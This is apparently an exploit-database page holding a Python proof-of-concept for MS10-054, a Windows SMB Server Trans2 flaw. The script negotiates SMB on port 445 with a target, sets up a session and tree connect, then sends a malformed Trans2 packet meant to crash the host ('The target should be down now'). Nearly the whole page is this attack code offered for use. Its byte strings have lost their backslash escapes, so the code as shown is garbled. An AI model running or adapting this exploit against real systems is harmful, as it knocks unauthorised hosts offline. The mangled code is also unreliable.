Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
Posted on 10 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================== Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) =========================================================== #!/usr/bin/env python import sys,struct,socket from socket import * if len(sys.argv)<=2: print '#######################################################################' print '# MS10-054 Proof Of Concept by Laurent Gaffie' print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)' print '# Example: python '+sys.argv[0]+' 192.168.8.101 users' print '# http://g-laurent.blogspot.com/' print '# http://twitter.com/laurentgaffie' print '# Email: laurent.gaffie{at}gmail{dot}com' print '####################################################################### ' sys.exit() host = str(sys.argv[1]),445 packetnego = "x00x00x00x9a" packetnego += "xffx53x4dx42x72x00x00x00x00x00x00x00x00x00x00x00" packetnego += "x00x00x00x00x00x00x00x00x00x00xc3x15x00x00x01x3d" packetnego += "x00x77x00x02x50x43x20x4ex45x54x57x4fx52x4bx20x50" packetnego += "x52x4fx47x52x41x4dx20x31x2ex30x00x02x4dx49x43x52" packetnego += "x4fx53x4fx46x54x20x4ex45x54x57x4fx52x4bx53x20x33" packetnego += "x2ex30x00x02x44x4fx53x20x4cx4dx31x2ex32x58x30x30" packetnego += "x32x00x02x44x4fx53x20x4cx41x4ex4dx41x4ex32x2ex31" packetnego += "x00x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57x6f" packetnego += "x72x6bx67x72x6fx75x70x73x20x33x2ex31x61x00x02x4e" packetnego += "x54x20x4cx4dx20x30x2ex31x32x00" def tidpiduidfield(data): all_=data[28:34] return all_ def handle(data): ##Chained SMB commands; Session Setup AndX Request,Tree connect if data[8:10] == "x72x00": sharename = "x00x00x5cx5cx5c"+str(sys.argv[2])+"x00x3fx3fx3fx3fx3fx00" packetsession = "xffx53x4dx42x73x00x00x00x00x10x00x00x00x00x00x00" packetsession += "x00x00x00x00x00x00x00x00x00x00xd5x15x01x00x81x2f" packetsession += "x0dx75x00x7ax00x68x0bx32x00x00x00x00x00x00x00x18" packetsession += "x00x00x00x00x00x00x00x04x00x00x00x3dx00x01x01x01" packetsession += "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" packetsession += "x01x01x01x01x01x59x4fx00x57x4fx52x4bx47x52x4fx55" packetsession += "x50x00x57x69x6ex64x6fx77x73x20x34x2ex30x00x57x69" packetsession += "x6ex64x6fx77x73x20x34x2ex30x00x04xffx00x00x00x00" packetsession += "x00x01x00"+struct.pack(">i", len(sharename))[3:4]+sharename print "[+]Session Query sent" return struct.pack(">i", len(packetsession))+packetsession ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info if data[8:10] == "x73x00": packetrans = "x00x00x00x46" packetrans += "xffx53x4dx42x32x00x00x00x00x00x01xc8x00x00x00x00" packetrans += "x00x00x00x00x00x00x00x00"+tidpiduidfield(data)+"x13x00" packetrans += "x0fx02x00x00x00x00x00x00x00x00x00x00x00x00x00x00" packetrans += "x00x00x00x02x00x44x00x00x00x46x00x01x00x03x00x05" packetrans += "x00x00x44x20x05x01" print "[+]Malformed Trans2 packet sent [+]The target should be down now" return packetrans def run(): s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.settimeout(2) s.send(packetnego) print "[+]Negotiate Protocol Request sent" try: while True: data = s.recv(1024) s.send(handle(data)) except Exception: pass s.close() run() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
